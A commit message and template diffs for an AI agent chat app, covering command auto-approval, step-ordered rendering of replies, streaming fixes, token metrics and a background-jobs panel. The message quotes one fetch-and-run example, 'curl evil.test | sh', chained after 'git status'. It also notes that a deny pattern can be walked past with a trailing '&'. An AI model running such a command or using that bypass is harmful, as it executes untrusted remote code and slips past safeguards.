A reply you can read while it is still being written

Seven things, and the thread running through them is that the machinery was
right and what a person saw of it was not.

Auto asked about every compound command. `policy.subject` refuses to let any
pattern match a line carrying a shell metacharacter -- correct, and the whole
reason `git *` cannot also mean `git status; curl evil.test | sh` -- and a rule
on top of that asked whenever a deny list existed at all. The shipped deny list
is non-empty, so `cd build && make` and `pytest | tail` both stopped for
approval in the one mode whose purpose is not stopping. Nobody read that as a
security control; they read it as Auto not working. It is gone, and what it
costs is written down beside it and under the admin field: a deny pattern can be
walked past with a trailing `&`. Matching each segment would restore both.

A forty-round agent reply rendered as three zones -- all the thinking, then
every tool block, then all the prose -- which is fine at two rounds and
unreadable at forty. `Message.steps_json` is a table of contents over the three
stores rather than a fourth copy of any of them, so `build_messages`, compaction
and titling still see one string. No marks means the old layout, which is what
every existing row reads back, with no version flag and no branch in the
template.

Nothing could be expanded while a reply streamed, and that was two faults. The
tool list was replaced wholesale twelve times a second, so an opened block shut
itself within 80ms; the ids are stable now and steps.js puts them back, across
the final swap as well. And the thread snapped to the bottom on every frame, so
a block that did open was scrolled off -- opening one now stops it following
until you scroll back down yourself. Both driven under a DOM stub before
committing, per the note in CLAUDE.md.

The metrics were never wrong, which is why this looked like arithmetic and was
not. One chip is what the reply cost and the other is what the conversation
occupies; on a multi-round reply those differ by a lot and neither said which it
was. What was broken is that they stood still -- usage arrives once a round, and
`reported or estimated` stops consulting the estimate the moment the first chunk
lands -- and that the `~` marking an estimate vanished at exactly the point
everything became one. Interpolated between counts now, never over them.

Background jobs had no surface at all. A chip counting what is still running and
a panel with each job's command, state, log tail and a Stop button; the fifth
exception to "the modes govern the model, not the interface", for the reason the
other four are.

file_edit had two faults worth more than the error text. A file it could not
read was reported to the model as an empty one, and a file too large to read
whole was patched and written back by a call that replaces -- deleting
everything past the ceiling, silently, and reporting success with a byte count.
Both refused now. A refused hunk also prints the file around where it landed,
which is most of the retry loop these models get into.

And a model can talk itself to a standstill: a round with no tool calls is a
model saying it has finished, so pages of "Ready? GO! ... Wait ... Actually ..."
ended the reply having done nothing. `core.commit` is the prompt half and a
second nudge signal is the other, narrowed to a long reply that touched nothing
so that finishing is never argued with.

Also: the scope menu is called Toggle and no longer offers to type an `@` for
you, and "Always allow this" says when it has stored nothing rather than
appearing to work.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
This commit is contained in:
Jaroslav Beneš
2026-08-04 19:02:07 +02:00
parent c0d6056ec4
commit 7df68eb44c
45 changed files with 2777 additions and 273 deletions
+26 -25
View File
@@ -153,8 +153,15 @@
This slot used to be an `@` button that inserted the character and
got out of the way -- which the `@` key already does, from the
keyboard, without a button. Typing `@` is untouched; composer.js
recognises the token on its own and knows nothing about this menu.
keyboard, without a button. It then kept that as a row inside the
menu, which was the same redundancy one level down: a menu you open
to press a button that types one character. Both are gone. Typing
`@` is untouched; composer.js recognises the token on its own and
knows nothing about this menu.
With the row gone there is nothing to show on a chat with no scope,
so the guard is `has_scope` alone rather than `has_scope or can
upload`. An empty menu is worse than no button.
The rows are `<label>`s wrapping a checkbox and deliberately carry
no `role="menuitem"`: ui.js closes a picker when a menuitem is
@@ -170,17 +177,16 @@
exists, and a switch that went nowhere is worse than no switch.
#}
{% set has_scope = chat and (scope_families or scope_skills or scope_allow) %}
{% if has_scope or can.get("files.upload") %}
{% if has_scope %}
<div class="picker picker--up" data-picker>
<button class="btn btn--icon composer__btn" type="button" data-picker-toggle
aria-haspopup="menu" aria-expanded="false"
aria-label="{{ 'What this chat can use' if has_scope else 'Mention a file' }}"
title="{{ 'What this chat can use' if has_scope else 'Mention a file' }}">
{{ icon("sliders" if has_scope else "at") }}
aria-label="Toggle" title="Toggle">
{{ icon("sliders") }}
</button>
<div class="picker__menu picker__menu--scope" data-picker-menu role="menu"
hidden aria-label="What this chat can use">
hidden aria-label="Toggle">
{% if has_scope %}
<p class="picker__lede">
Switched off here only. Everything is on unless you say otherwise.
@@ -246,24 +252,6 @@
</div>
{% endif %}
{# The affordance the `@` button used to be, kept as one row so
nothing is lost by replacing the button -- and it is what this
menu holds on a chat that does not exist yet, where there is no
scope to narrow.
This one DOES carry role="menuitem", unlike the switches above:
it is an action, so ui.js closing the picker after it is
exactly right. #}
{% if can.get("files.upload") %}
<button class="picker__option" type="button" role="menuitem"
data-mention-open>
{{ icon("at", "icon--sm") }}
<span class="picker__option-body">
<span class="picker__option-name">Mention a file or a document</span>
<span class="picker__option-note">Or just type @</span>
</span>
</button>
{% endif %}
</div>
</div>
{% endif %}
@@ -357,6 +345,19 @@
{% endfor %}
</select>
</div>
{# What is still running on the far side. Only where jobs can exist at
all -- a chat without background commands enabled has none, and a chip
that could never show anything is a chip that only takes room.
`hx-trigger="load"` and not the contents inline: the listing reads the
`agent_jobs` table, and the composer is rendered on every page load
and after every reply. One request five seconds later costs nothing;
a query on the render path costs it every time. #}
{% if jobs_enabled %}
<div hx-get="/api/chats/{{ chat.id }}/jobs" hx-trigger="load"
hx-swap="outerHTML"></div>
{% endif %}
{% endif %}
{#
@@ -0,0 +1,37 @@
{% from "_macros.html" import icon %}
{#
How many commands are still running on the far side.
Rendered even at zero, and that is not a stylistic choice: this element
carries the `hx-trigger` that polls, so a fragment that collapsed to nothing
would replace itself with nothing and stop polling -- the first job started
afterwards would never appear, and the chip would look broken in exactly the
way a background job is hardest to notice.
Swapped `outerHTML` onto itself, so the reply is the whole element including
the trigger. Every response has to be a complete chip for the same reason.
#}
<div class="composer__jobs" id="jobs-chip"
hx-get="/api/chats/{{ chat.id }}/jobs"
hx-trigger="every 5s"
hx-swap="outerHTML">
{% if running %}
<div class="picker picker--up" data-picker>
<button class="btn btn--sm composer__chip composer__chip--jobs" type="button"
data-picker-toggle aria-haspopup="menu" aria-expanded="false"
hx-get="/api/chats/{{ chat.id }}/jobs/panel"
hx-target="#jobs-panel" hx-swap="innerHTML"
title="{{ running }} background {{ 'job' if running == 1 else 'jobs' }} running">
{{ icon("clock", "icon--sm") }}
<span>{{ running }} {{ 'job' if running == 1 else 'jobs' }}</span>
</button>
{# Filled by the button above rather than rendered here: the panel needs one
SSH round trip per expanded log, and the chip is polled every five
seconds. Rendering it inside the poll would fetch output nobody has
opened, on a loop. #}
<div class="picker__menu picker__menu--jobs" data-picker-menu role="menu"
hidden aria-label="Background jobs" id="jobs-panel"></div>
</div>
{% endif %}
</div>
@@ -0,0 +1,75 @@
{% from "_macros.html" import icon %}
{#
What is running on the far side, and what it has printed.
EVERYTHING here came off somebody else's machine and is untrusted exactly as
much as model output is: the command was written by a model, the log is
whatever the command printed. Jinja autoescaping covers the lot, and the log
is `<pre>` rather than anything that could emit HTML -- services/markdown.py is
the one path allowed to do that, and this is the last content that should be
given it.
Not polled. The chip beside the composer is what refreshes on a timer; this is
fetched when somebody opens it and re-rendered when they press something,
because reading a log is an SSH round trip per job and nobody is looking at
most of them.
#}
{% if not jobs %}
<p class="picker__lede">Nothing is running.</p>
{% else %}
<p class="picker__group">Background jobs</p>
{% for job in jobs %}
<div class="jobs__row{{ ' jobs__row--open' if open_job == job.id }}">
<div class="jobs__head">
<span class="jobs__dot jobs__dot--{{ job.status }}"
title="{{ job.status }}{% if job.exit_status is not none %} ({{ job.exit_status }}){% endif %}"></span>
{# The whole command in the title, a truncated one on screen. A command line
is unbounded and this sits in a menu with a fixed width; CSS truncates,
and the title is how you read the rest. #}
<button class="jobs__command" type="button"
title="{{ job.command }}"
hx-get="/api/chats/{{ chat.id }}/jobs/panel{% if open_job != job.id %}?job={{ job.id }}{% endif %}"
hx-target="#jobs-panel" hx-swap="innerHTML">
<code>{{ job.command or "(no command recorded)" }}</code>
</button>
{% if job.running %}
<button class="btn btn--sm btn--danger jobs__stop" type="button"
hx-post="/api/chats/{{ chat.id }}/jobs/{{ job.id }}/stop"
hx-target="#jobs-panel" hx-swap="innerHTML"
data-confirm-button="Stop this job? It and everything it started are killed.">
Stop
</button>
{% endif %}
</div>
<p class="jobs__meta">
{% if job.running %}
Running
{% elif job.status == "killed" %}
Stopped
{% elif job.status == "lost" %}
{# The far side has no record of it: the host rebooted, or /tmp was
cleared. Said plainly rather than shown as a failure, because nothing
failed -- we simply cannot say how it ended. #}
No longer traceable
{% elif job.exit_status %}
Failed, exit {{ job.exit_status }}
{% else %}
Finished
{% endif %}
{% if job.started_at %}· started {{ job.started_at.strftime("%H:%M") }}{% endif %}
</p>
{% if open_job == job.id %}
{% if error %}
<p class="jobs__error">{{ error }}</p>
{% else %}
<pre class="jobs__log">{{ body or "Nothing printed yet." }}</pre>
{% endif %}
{% endif %}
</div>
{% endfor %}
{% endif %}
+28 -56
View File
@@ -95,28 +95,16 @@
{% endif %}
{% if streaming %}
{# Reasoning arrives before the answer, so this block sits above it.
Closed by default -- the answer is what the reader is waiting for, and
the thinking is one click away. The :has() rule in chat.css hides the
whole thing while it is still empty, so models that emit no reasoning
never show an empty box. #}
<details class="reasoning reasoning--live" id="reasoning-{{ message.id }}">
<summary class="reasoning__summary">
{{ icon("sparkle", "icon--sm reasoning__icon") }}
<span class="reasoning__label">Thinking…</span>
{{ icon("chevron-down", "icon--sm reasoning__chevron") }}
</summary>
{# innerHTML, not beforeend: the frame carries the whole block of
thinking each time, exactly as `render` and `tools` do. Appending it
repeated everything already shown, so the panel grew quadratically. #}
<div class="reasoning__body" sse-swap="reasoning" hx-swap="innerHTML"></div>
</details>
{# Tool activity as it happens. Empty until the model asks for something,
and the whole block is replaced each time rather than appended to --
a follower attaching late has no earlier fragments to build on. #}
<div class="tool-activity-list" id="tools-{{ message.id }}"
sse-swap="tools" hx-swap="innerHTML"></div>
{# The reply as a sequence of steps, in the order they happened. The
closed ones are re-sent only when a round ends; the two live containers
come with them, inside `_steps.html`, which is how the tail blanks
itself. See services/steps.py. #}
<div class="msg__steps" id="steps-{{ message.id }}" data-steps
sse-swap="steps" hx-swap="innerHTML">
{% with steps = [], live = true %}
{% include "chat/_steps.html" %}
{% endwith %}
</div>
{# Where a question from the model, or a command waiting to be allowed,
lands. Unlike the blocks above it this frame is sent on every version
@@ -126,11 +114,6 @@
<div class="interaction-slot" id="ask-{{ message.id }}"
sse-swap="ask" hx-swap="innerHTML"></div>
{# The server re-renders the answer as Markdown a few times a second and
replaces this whole block, so formatting appears as the model writes
rather than snapping into place at the end. #}
<div class="msg__body msg__body--live" id="stream-{{ message.id }}"
sse-swap="render" hx-swap="innerHTML"></div>
{# No stop button here: the composer's send button becomes Stop while a
reply is being written, which is where the hand already is. #}
<div class="msg__waiting">
@@ -145,34 +128,26 @@
<div class="msg__metrics" id="metrics-{{ message.id }}"
sse-swap="metrics" hx-swap="innerHTML"></div>
{% else %}
{# Finished. Same order as the live view above -- thinking, then what it
looked up, then the answer -- so a reply does not rearrange itself the
moment it stops streaming. #}
{% if message.reasoning and not message.error %}
{# Collapsed once finished: the answer is what the reader came for, and
the thinking is there if they want to audit it. #}
<details class="reasoning" id="reasoning-{{ message.id }}">
<summary class="reasoning__summary">
{{ icon("sparkle", "icon--sm reasoning__icon") }}
<span class="reasoning__label">
{% if message.reasoning_ms %}
Thought for {{ message.reasoning_ms | duration }}
{% else %}
Reasoning
{% endif %}
</span>
{{ icon("chevron-down", "icon--sm reasoning__chevron") }}
</summary>
<div class="reasoning__body">{{ message.reasoning }}</div>
</details>
{% endif %}
{# Finished, and rendered from the same partial the live view uses so the
bubble cannot rearrange itself the moment the stream ends.
{% if message.tool_calls_json %}
{# Kept with the message rather than discarded with the stream, so the
`message_steps` is a Jinja global rather than something each handler
passes, for the reason `tool_label` is: this template is rendered from
four different places and a fifth thing to remember is a fifth thing one
of them forgets. A reply written before the marks existed has none, and
`steps.py` answers that with the old layout exactly -- thinking, then
every tool block, then the whole answer.
Kept with the message rather than discarded with the stream, so the
sources behind an answer are still there tomorrow. #}
<div class="tool-activity-list">
{% with tool_events = message.tool_calls_json, live = false %}
{% include "chat/_tool_activity.html" %}
{% if message.role == "assistant" %}
{# The same id and the same marker as the live container. That is what
carries an opened block across the `done` frame, which replaces the
whole bubble: steps.js keys what it remembers on this id, and the ids
inside come from the mark index either way. #}
<div class="msg__steps" id="steps-{{ message.id }}" data-steps>
{% with steps = message_steps(message), live = false %}
{% include "chat/_steps.html" %}
{% endwith %}
</div>
{% endif %}
@@ -188,9 +163,6 @@
{% endif %}
{% if message.role == "assistant" %}
{% if message.content %}
<div class="msg__body">{{ body_html|safe }}</div>
{% endif %}
{% if message.stopped %}
<p class="msg__note">{{ icon("x", "icon--sm") }} Stopped. This reply is cut short.</p>
{% endif %}
+7 -2
View File
@@ -7,15 +7,20 @@
at about four characters per token. Nothing here is ever shown as exact when
it is not.
#}
{# The first chip is what the reply COST and the second is what it OCCUPIES.
They are different numbers and a multi-round reply makes them very different
-- it pays for its prompt once per round and only ever sits in the window
once -- so each title says which it is. Without that, two token counts a few
centimetres apart just look like one of them is wrong. #}
{% if metrics.has_anything %}
<span class="metric" title="{% if metrics.estimated %}Estimated: this endpoint reports no token counts.
{% endif %}{{ metrics.prompt_tokens }} in, {{ metrics.completion_tokens }} out{% if metrics.rounds > 1 %}, over {{ metrics.rounds }} rounds of tool calls{% endif %}">
{% endif %}What this reply cost: {{ metrics.prompt_tokens }} in, {{ metrics.completion_tokens }} out{% if metrics.rounds > 1 %}, the prompt paid for once in each of {{ metrics.rounds }} rounds of tool calls{% endif %}">
{% if metrics.estimated %}~{% endif %}{{ metrics.total_tokens }} tokens
</span>
{% if metrics.context_limit %}
<span class="metric metric--context{{ ' is-' ~ metrics.pressure if metrics.pressure }}"
title="{% if metrics.estimated %}Estimated. {% endif %}{{ metrics.context_tokens }} of {{ metrics.context_limit }} tokens of context used">
title="{% if metrics.estimated %}Estimated. {% endif %}What the conversation now occupies: {{ metrics.context_tokens }} of {{ metrics.context_limit }} tokens">
<span class="metric__bar">
{# A width is data, not a design value: it is the measurement itself. #}
<span class="metric__fill" style="width: {{ metrics.percent }}%"></span>
+49
View File
@@ -0,0 +1,49 @@
{% from "_macros.html" import icon %}
{#
One step of a reply: what the model thought, what it said, or what it ran.
The only `|safe` here is `step.html`, which came out of `services/markdown.py`
and is the one path allowed to emit HTML. Thinking is printed as text and
autoescaped by Jinja; tool events go through `_tool_activity.html`, which
escapes everything for itself.
Ids are `think-{message}-{index}` and, inside the tool block,
`tool-{message}-{index}-{n}`. The index is the position of the mark this step
came from and the marks are append-only, so an id means the same step for ever
-- live, and again in the finished bubble that replaces it.
#}
{% if step.kind == "thinking" %}
{# Collapsed. The answer is what the reader is waiting for and the thinking is
one click away -- and on a long agent reply there are a dozen of these, so
any other default would bury the work between them. #}
<details class="reasoning" id="think-{{ message.id }}-{{ step.index }}">
<summary class="reasoning__summary">
{{ icon("sparkle", "icon--sm reasoning__icon") }}
<span class="reasoning__label">
{% if step.index == 0 and message.reasoning_ms %}
{# The duration is for the whole reply, so only the first block may
claim it. Repeating it on each would be four blocks each saying
they took ninety seconds. #}
Thought for {{ message.reasoning_ms | duration }}
{% else %}
Thought
{% endif %}
</span>
{{ icon("chevron-down", "icon--sm reasoning__chevron") }}
</summary>
<div class="reasoning__body">{{ step.text }}</div>
</details>
{% elif step.kind == "text" %}
{# `--live` only on the step still being written, so the caret lands at the end
of the reply rather than after every paragraph that preceded a tool call. #}
<div class="msg__body{{ ' msg__body--live' if step.open }}">{{ step.html|safe }}</div>
{% else %}
<div class="tool-activity-list">
{% with tool_events = step.events, message_id = message.id,
step_index = step.index, live = step.open %}
{% include "chat/_tool_activity.html" %}
{% endwith %}
</div>
{% endif %}
+22
View File
@@ -0,0 +1,22 @@
{#
A reply as the sequence it was: thinking, prose, a tool call, more prose.
Used by BOTH branches of `_message.html` -- the streaming shell and the
finished bubble -- from the same builder, so a reply cannot rearrange itself
the moment the stream ends. That was the point of putting the marks on the row
rather than only on the running generation.
When `live`, the two containers for the step still being written come last, and
they are part of *this* fragment rather than of `_message.html`. That is what
lets the tail clear itself: the `steps` frame is sent whenever a round closes
and re-emits them empty, so the prose and thinking that have just become a
closed step above do not also linger below. `reasoning` and `render` keep their
"never send an empty one" guard, and `metrics`, `status` and `ask` remain the
only frames allowed to blank what is on screen.
#}
{% for step in steps %}
{% include "chat/_step.html" %}
{% endfor %}
{% if live %}
{% include "chat/_steps_tail.html" %}
{% endif %}
@@ -0,0 +1,29 @@
{% from "_macros.html" import icon %}
{#
The step still being written: everything past the last mark.
These two are the only things that move at streaming speed. Everything above
them is closed and is re-sent only when a round ends, which is what keeps a
forty-round reply from re-rendering its whole transcript twelve times a second.
Both carry the complete block each time rather than a delta -- that is what
makes reattaching to a reply in progress work at all, since a follower arriving
late has no earlier fragments to append to.
The reasoning wrapper is static and only its body is swapped, so a reader who
opens it keeps it open for as long as this step lasts. When the round closes it
becomes a `think-…` block above and comes back collapsed; that is a real seam
and it is left visible rather than papered over with a mapping from an
ephemeral id to a permanent one.
#}
<details class="reasoning reasoning--live" id="reasoning-{{ message.id }}">
<summary class="reasoning__summary">
{{ icon("sparkle", "icon--sm reasoning__icon") }}
<span class="reasoning__label">Thinking…</span>
{{ icon("chevron-down", "icon--sm reasoning__chevron") }}
</summary>
<div class="reasoning__body" sse-swap="reasoning" hx-swap="innerHTML"></div>
</details>
<div class="msg__body msg__body--live" id="stream-{{ message.id }}"
sse-swap="render" hx-swap="innerHTML"></div>
@@ -27,9 +27,23 @@
so a resolver that preferred the stored value would leave every existing
transcript saying "homeserver" where it means "Bash".
#}
{#
`message_id` and `step_index` place this block in the reply, and an id is
emitted only when the caller gave one. That is not defensiveness: an id is
what carries an *opened* block across a swap, and a caller with no message to
key on would emit the same id in every bubble on the page, which is worse than
emitting none. `_step.html` always passes one.
`steps.js` records which of these are open before a swap and puts them back
after. It works because the id is stable -- the step index comes from a mark,
the marks are append-only, and the finished bubble emits exactly what the live
one did, so a block opened at round three is still open after the `done` frame
replaces the whole article.
#}
{% for event in tool_events %}
{% set kind = event.kind or ('search' if event.name == 'web_search' else 'tool') %}
<details class="tool-activity {{ 'tool-activity--error' if event.status == 'error' }}">
<details class="tool-activity {{ 'tool-activity--error' if event.status == 'error' }}"
{% if message_id | default('') %}id="tool-{{ message_id }}-{{ step_index | default(0) }}-{{ loop.index0 }}"{% endif %}>
<summary class="tool-activity__summary">
{{ icon(tool_icon(event), "icon--sm tool-activity__icon") }}
+3
View File
@@ -344,6 +344,9 @@
{% endblock %}
{% block scripts %}
{# Unconditional: every chat has a transcript, and this is what keeps a block
somebody opened open across the swaps that arrive twelve times a second. #}
<script src="{{ url_for('static', path='js/steps.js') }}" defer></script>
{% if canvas_enabled %}
<script src="{{ url_for('static', path='js/canvas.js') }}" defer></script>
{% endif %}